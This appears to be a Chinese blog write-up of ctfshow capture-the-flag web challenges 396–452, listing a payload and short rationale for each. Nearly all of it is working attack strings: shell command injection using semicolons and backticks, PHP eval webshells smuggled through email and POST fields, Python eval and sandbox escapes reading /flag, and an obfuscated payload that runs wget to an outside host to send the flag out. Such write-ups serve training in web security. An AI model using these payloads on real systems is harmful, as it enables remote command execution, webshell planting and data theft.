Web396-401

payload

http://127.0.0.1/1;echo `cat fl0g.php` > a.html
file://1/1;echo `cat fl0g.php` > a.html
原理:使用;终结语句,然后关键点在后面的echo语句,执行的shell命令

Web402-403

payload

url/?url=http://127.0.0.1/1;echo `tac fl0g.php` >a.html

Web407

payload

ip=cafe::add
原理: 直接使用类中的静态方法,类::方法

Web408

payload

email="<?=eval($_POST[1])?>"@a.php
原理:首先去除空格,用下大佬的话非法字符放在双引号里面绕过email@前缀限制

Web409

payload

email="flagsystem($_POST[1]);?>"@123.com
然后post数据
1=cat /flag

原理:https://blog.csdn.net/solitudi/article/details/113778651

Web410

payload

b=on或者b=yes
原理:https://www.w3school.com.cn/php/filter_validate_boolean.asp

Web411

payload

b=oN或者b=yes
原理:https://www.w3school.com.cn/php/filter_validate_boolean.asp

Web412

payload

POST传入 ctfshow=?><?=eval($_POST[1]);
然后访问flag.php
原理:闭合语法

Web413

payload

POST传入 ctfshow=*/?><?=eval($_POST[1]);/*
然后访问flag.php
原理:闭合语法

Web414

payload

原理: 字符串intval为0
ctfshow=-1

Web415

payload

k=Getflag
原理:call_user_func调用的函数不区分大小写

Web416

payload

f=ctf::flag
原理:直接通过类调用方法

Web417

payload

ctf=show
原理:跟着绕,可以用本地环境调试

Web418

payload

key=a&die=0&clear=./a;tac flag.php > a.html
原理:注意看最下面有代码;shell_exec存在代码漏洞,注意使用;闭合掉,然后自己写命令

Web419

payload

POST传入code=`cp fla* t`;
原理:使用``代表执行命令,把flag文件复制一下即可
code=eval($_POST[1]);&1=system('cat flag.php');
原理:逃逸

Web420

payload

code=nl ../*
原理(没看懂):https://blog.csdn.net/miuzzx/article/details/112692697

Web421

payload

code=nl f*
原理:nl查看,搭配通配符

Web422

payload

code=nl *
原理:nl查看,搭配通配符

Web423

paylaod

?code=__import__('os').popen('cat /flag').read()
?code=open('/flag').read()

Web424

payload

?code=__import__('os').popen('tac /flag').read()
?code=open('/flag').read()

Web425

payload

?code=open('/flag').read()

Web426-431

payload

?code= open('/flag').read()

Web432-434

payload

?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__buil''tins__']['__imp'+'ort__']('o'+'s').__dict__['pop'+'en']('wget http://mc.krkr.xyz:8888/?shell=`cat /flag`'))

Web450

payload

?ctfshow=phpinfo^phpinfo^phpinfo

Web451

payload

?ctfshow=phpanfo^phpznfo^phprnfo

Web452

payload

?ctfshow=echo `tac /fla*`;
原理:命令执行
最后修改:2022 年 07 月 17 日
如果觉得我的文章对你有用,请随意赞赏